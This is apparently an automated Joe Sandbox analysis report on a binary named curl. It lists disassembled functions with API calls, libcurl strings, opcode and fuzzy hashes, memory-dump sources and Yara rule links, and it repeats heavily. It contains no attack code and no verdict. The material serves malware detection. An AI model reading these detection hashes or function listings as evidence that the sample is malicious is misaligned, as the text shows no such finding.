String ID: curl: (%d) [globbing] %s$unmatched close brace/bracket$lF
API String ID: 1409160320-112272764
Opcode ID: 35ac7f74e2cca843574f016d8b6c6be37e213cb6c9fe070a095dc29998b071ab
Instruction ID: 68ecbef09cc935991693df4ce77d55780583c7f41ed0c78620219be5f6ebe12c
Opcode Fuzzy Hash: 35ac7f74e2cca843574f016d8b6c6be37e213cb6c9fe070a095dc29998b071ab
Instruction Fuzzy Hash: ACF0C4B5B043458BD730AF59D84079AB7E5AB84314F01882EE98C9B340E7799944CB99

Function 00401500 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,?,?,004523CB), ref: 00401516
GetProcAddress.KERNEL32 ref: 00401533

Strings

_Jv_RegisterClasses, xrefs: 00401528
libgcj-13.dll, xrefs: 0040150F

Memory Dump Source

Source File: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: _Jv_RegisterClasses$libgcj-13.dll
API String ID: 1646373207-3682238868
Opcode ID: 6489afae99969da46c14b7397deb1a65941ab50d357583114348cb0a69521325
Instruction ID: 437d221d9f076d84011915e21e57a15638983ab6391a5d18805d84c8b12d989d
Opcode Fuzzy Hash: 6489afae99969da46c14b7397deb1a65941ab50d357583114348cb0a69521325
Instruction Fuzzy Hash: B9E012B46043016BD7103F7CAD0921B7EE49BC0B4AF55843DDC86AA299EB78C589C75A

Function 00401509 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,?,?,004523CB), ref: 00401516
GetProcAddress.KERNEL32 ref: 00401533

Strings

_Jv_RegisterClasses, xrefs: 00401528
libgcj-13.dll, xrefs: 0040150F

Memory Dump Source

Source File: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: _Jv_RegisterClasses$libgcj-13.dll
API String ID: 1646373207-3682238868
Opcode ID: 925968303af0bb48ebaf339f604f5816bacf88d891b99ee2b7116d0b1802d11e
Instruction ID: a8bc7f3d82c36e43a07aefca70caecfda332d408f78f49a23addfae03e96c9c9
Opcode Fuzzy Hash: 925968303af0bb48ebaf339f604f5816bacf88d891b99ee2b7116d0b1802d11e
Instruction Fuzzy Hash: 0AE046B05043005BD7003B7CA90921E7EE4ABC0B4AF91843DCC86AA299EB78C489879A

Function 00445CA0 Relevance: 6.3, APIs: 5, Instructions: 71stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00445CAE
strlen.MSVCRT ref: 00445CBF
memcpy.MSVCRT ref: 00445CF0
memcpy.MSVCRT ref: 00445D0C
memcpy.MSVCRT ref: 00445D29

Part of subcall function 00443440: curl_msnprintf.CURL ref: 0044355B
Part of subcall function 00443440: strlen.MSVCRT ref: 00443581

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: memcpystrlen$curl_msnprintf
String ID:
API String ID: 4130262127-0
Opcode ID: 0459749d9ca0e08fb3af76a77d7d9ee2acae20adc284f6f5a25753613c8775ff
Instruction ID: d09a420bd5667e9499eacf6b38375706aa401125408e20ff691716beb7c57564
Opcode Fuzzy Hash: 0459749d9ca0e08fb3af76a77d7d9ee2acae20adc284f6f5a25753613c8775ff
Instruction Fuzzy Hash: C921A0B46087019FC710EF69D48465AFBE4EB89749F01882EE98887316E275E8448B96

Function 004250A0 Relevance: 6.1, APIs: 4, Instructions: 143networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32 ref: 004250CD
memcpy.MSVCRT ref: 0042519B
freeaddrinfo.WS2_32 ref: 004251ED
WSASetLastError.WS2_32 ref: 0042524F

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: ErrorLastfreeaddrinfogetaddrinfomemcpy
String ID:
API String ID: 4195171763-0
Opcode ID: 2f299700ac5b42e2bdbc6aabb7835129bc2a143d2d84211562ffbe1d0e932d37
Instruction ID: 7c58d4cededbf55a8ef78c64b272d6ec3247812be28f80006f23b6d4650c2e81
Opcode Fuzzy Hash: 2f299700ac5b42e2bdbc6aabb7835129bc2a143d2d84211562ffbe1d0e932d37
Instruction Fuzzy Hash: 5E5106B0A00725DFDB10DFA9E98476ABBF4BF08740F40846AE84497341D778E951CFA6

Function 0042213C Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 124stringCOMMON

Download Yara Rule

APIs

strchr.MSVCRT ref: 0042207B
strchr.MSVCRT ref: 00422168

Strings

;, xrefs: 0042215D
path, xrefs: 00421FE3

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: strchr
String ID: ;$path
API String ID: 2830005266-3241052954
Opcode ID: de822c6cb2970aeeb3bdff16397980b8e0de94d52ea4d058da03949cd0b7e892
Instruction ID: c8342f65ee9d6a742da3ccd2efef3c30c04eb459e9519236d9fa6057a59d9bf1
Opcode Fuzzy Hash: de822c6cb2970aeeb3bdff16397980b8e0de94d52ea4d058da03949cd0b7e892
Instruction Fuzzy Hash: A741A071704320ABD720DF25AA8032BB7E1BF94754F89491FE89997391E378ED41CB4A

Function 0043BAB0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 121COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0043BB5C

Strings

Failed to alloc scratch buffer!, xrefs: 0043BC4F
., xrefs: 0043BB4B, 0043BBFA

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: memcpy
String ID: .$Failed to alloc scratch buffer!
API String ID: 3510742995-845515642
Opcode ID: 9cb11fc68410a906a74ec978bcd57b58c633adb3737af6a650ca5ee684f44a36
Instruction ID: 0440c8ee0aff7b2f2a57cc75c20304bc1031d140a54bab9bfe8e181438c1fd4e
Opcode Fuzzy Hash: 9cb11fc68410a906a74ec978bcd57b58c633adb3737af6a650ca5ee684f44a36
Instruction Fuzzy Hash: 1A411B71A047049BD720DF25C88079BB7E0FB98314F15D82EE9998B715DB78E9408F85

Function 00410A80 Relevance: 6.1, APIs: 4, Instructions: 111stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00410A99

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 468a246357d406ef1ec80b67308fe8b9bd7007988b18dc4659291db5c97c627c
Instruction ID: b64e3d6daa9140ee19e76cada3dde384a0c9d456728b5b5250f7ec14b5441c9d
Opcode Fuzzy Hash: 468a246357d406ef1ec80b67308fe8b9bd7007988b18dc4659291db5c97c627c
Instruction Fuzzy Hash: 2D419F3060C3458FC710DFA9D4846ABFBE1AF85348F04482EE8C887351D6B8E9C5CB6A

Function 00411970 Relevance: 6.1, APIs: 4, Instructions: 107stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00411A10
memcpy.MSVCRT ref: 00411A3F

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: memcpystrlen
String ID:
API String ID: 3412268980-0
Opcode ID: 1371cd855d14289abcbd1aeb385cd0e36cac4c4fbebbf8447012fe27a416d14f
Instruction ID: fb725da496c04082d51b7fd2e8531c4eb26f919c33af1b497aec806d6a68445a
Opcode Fuzzy Hash: 1371cd855d14289abcbd1aeb385cd0e36cac4c4fbebbf8447012fe27a416d14f
Instruction Fuzzy Hash: D1412AB06093028BD710DF2AC48065BBBE1FF84794F14882EE9D9C7320E738D881CB5A

Function 0042C699 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 93stringCOMMON

Download Yara Rule

APIs

strstr.MSVCRT ref: 0042C732

Part of subcall function 004166C0: curl_mvsnprintf.CURL(?,?,?,?,?,?,?,?,0041AB91), ref: 004166EA
Part of subcall function 004166C0: strlen.MSVCRT ref: 00416710

Strings

FTPS not supported!, xrefs: 0042C6D1
;type=, xrefs: 0042C727, 0042C800

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_mvsnprintfstrlenstrstr
String ID: ;type=$FTPS not supported!
API String ID: 586368842-2271472972
Opcode ID: e74fd0e8426647463be136484086a693ea007e48f65eab2d25ddee05366fbad6
Instruction ID: 13421a8adead36042d686e38cb103a178c14ad1d311ffce6e502bb5492ed431a
Opcode Fuzzy Hash: e74fd0e8426647463be136484086a693ea007e48f65eab2d25ddee05366fbad6
Instruction Fuzzy Hash: D231AEB52047158BD720AF25E4843AABBE4FF40314F58856EDC988F342E779A444CFAA

Function 00417C4C Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 93stringCOMMON

Download Yara Rule

APIs

sscanf.MSVCRT ref: 00417C82
strlen.MSVCRT ref: 00417CC6

Strings

%255[^:]:%d:%255s, xrefs: 00417C77
Added %s:%d:%s to DNS cache, xrefs: 00417D7B

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: sscanfstrlen
String ID: %255[^:]:%d:%255s$Added %s:%d:%s to DNS cache
API String ID: 2693918933-1904924449
Opcode ID: f37408fb37599171a012f3ad8304ce244a8c859269f50fbbf55ba79d471e7fde
Instruction ID: dce04cb5e6dff83bdb938adf97ac91429e258dfadeab1a15414ed9bb903ceefd
Opcode Fuzzy Hash: f37408fb37599171a012f3ad8304ce244a8c859269f50fbbf55ba79d471e7fde
Instruction Fuzzy Hash: 2041A2B46087069FC710EF29D48466BBBE4BF88744F54882EE88887311E778D984CB96

Function 0043920C Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 83stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0043921F

Part of subcall function 004166C0: curl_mvsnprintf.CURL(?,?,?,?,?,?,?,?,0041AB91), ref: 004166EA
Part of subcall function 004166C0: strlen.MSVCRT ref: 00416710

Strings

CAPA, xrefs: 00439344
Got unexpected pop3-server response, xrefs: 00439234

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: strlen$curl_mvsnprintf
String ID: CAPA$Got unexpected pop3-server response
API String ID: 552480945-1591402739
Opcode ID: b3a4fdaaa3c788ac6dc0227d053cef5e1fa736f641fd56bc18a4f25837dcca21
Instruction ID: b0e4c4b7e339ad9a43dbe6fa16ee9be3aa9cbe5f296549c706a56bb1a2e63262
Opcode Fuzzy Hash: b3a4fdaaa3c788ac6dc0227d053cef5e1fa736f641fd56bc18a4f25837dcca21
Instruction Fuzzy Hash: 9B315EB19083008FD7249F25C48436BBBE0AF8C358F18996FE99D9B351D7799944CF4A

Function 00406F80 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00406FA2
_getch.MSVCRT ref: 00406FB7
fputc.MSVCRT ref: 00406FF3
fputc.MSVCRT ref: 00407039

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: fputc$_getchfputs
String ID:
API String ID: 3104575063-0
Opcode ID: 94872fb17d68fddc4a4a8de098d5664445dffa3d604b749d3aae8f264f426e0f
Instruction ID: 6add1c73fcca23dc8b45586af20822b2b15723e53d8efce44580794aeb708058
Opcode Fuzzy Hash: 94872fb17d68fddc4a4a8de098d5664445dffa3d604b749d3aae8f264f426e0f
Instruction Fuzzy Hash: 26113B726083854BC720AF7CE884B1BB7D1E781358F090A3FF88997381E67D9851871B

Function 00418760 Relevance: 6.1, APIs: 4, Instructions: 66stringCOMMON

Download Yara Rule

APIs

strncpy.MSVCRT ref: 004187B8
strncpy.MSVCRT ref: 004187E5
curl_easy_unescape.CURL ref: 00418809
curl_easy_unescape.CURL ref: 00418832

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_easy_unescapestrncpy
String ID:
API String ID: 196471462-0
Opcode ID: 314693f8227395596b311e5a2995a9b37c76144212908fbb350c53aae6bb4c9f
Instruction ID: 1b835b4aa8b35b3bb7dffb7ab7b930235ac87cd8271dc71f12848f832b36b343
Opcode Fuzzy Hash: 314693f8227395596b311e5a2995a9b37c76144212908fbb350c53aae6bb4c9f
Instruction Fuzzy Hash: 402129B16083459BE7209F25D4553DBBBE4AF84348F048C3EE5988B381E7B994898B96

Function 00437F52 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 00437F85
memcmp.MSVCRT ref: 00437FB3

Strings

-ERR, xrefs: 00437F7E
+OK, xrefs: 00437FAC

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: memcmp
String ID: +OK$-ERR
API String ID: 1475443563-188932180
Opcode ID: c75039c24eb37d560ad75511b90d498ebf2901b90894f78160d8135bf991953b
Instruction ID: ad817d605b6063b64eba8893520af6b17a08a664e21dd431f3e7dafef8f240bb
Opcode Fuzzy Hash: c75039c24eb37d560ad75511b90d498ebf2901b90894f78160d8135bf991953b
Instruction Fuzzy Hash: CA113AF1A083414BEB20AB18E884357B7E0BB48318F16499FF9C45B351E7799D81CB96

Function 0044BE70 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

_lock.MSVCRT ref: 0044BE95
__dllonexit.MSVCRT ref: 0044BED3
_unlock.MSVCRT ref: 0044BF03
_onexit.MSVCRT ref: 0044BF17

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: __dllonexit_lock_onexit_unlock
String ID:
API String ID: 209411981-0
Opcode ID: c0b2e53ae77c6294dc5062f254dbd085b38befd484d79c5df83af973771a71da
Instruction ID: f2f0557fdb402994df004ff4eddd0a7cbe9f9825f2957d879b3806585b1f193e
Opcode Fuzzy Hash: c0b2e53ae77c6294dc5062f254dbd085b38befd484d79c5df83af973771a71da
Instruction Fuzzy Hash: D91190B09097058FD740EF79D48565ABBE1FB88345F514D2EF88887322E738D4888B86

Function 0042DB10 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 294COMMON

Download Yara Rule

Strings

unknown proxytype option given, xrefs: 0042E026
Connection to proxy confirmed, xrefs: 0042DD20

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID:
String ID: Connection to proxy confirmed$unknown proxytype option given
API String ID: 0-2790902098
Opcode ID: fc6cb6ff7861b2aa46e9880a89394adda920110e6960fcb88534053c58bf5542
Instruction ID: 74998ac7111ee3ddd37c4c9cf9af9fa5c8cc0b02d6e2254b5264f009a1264304
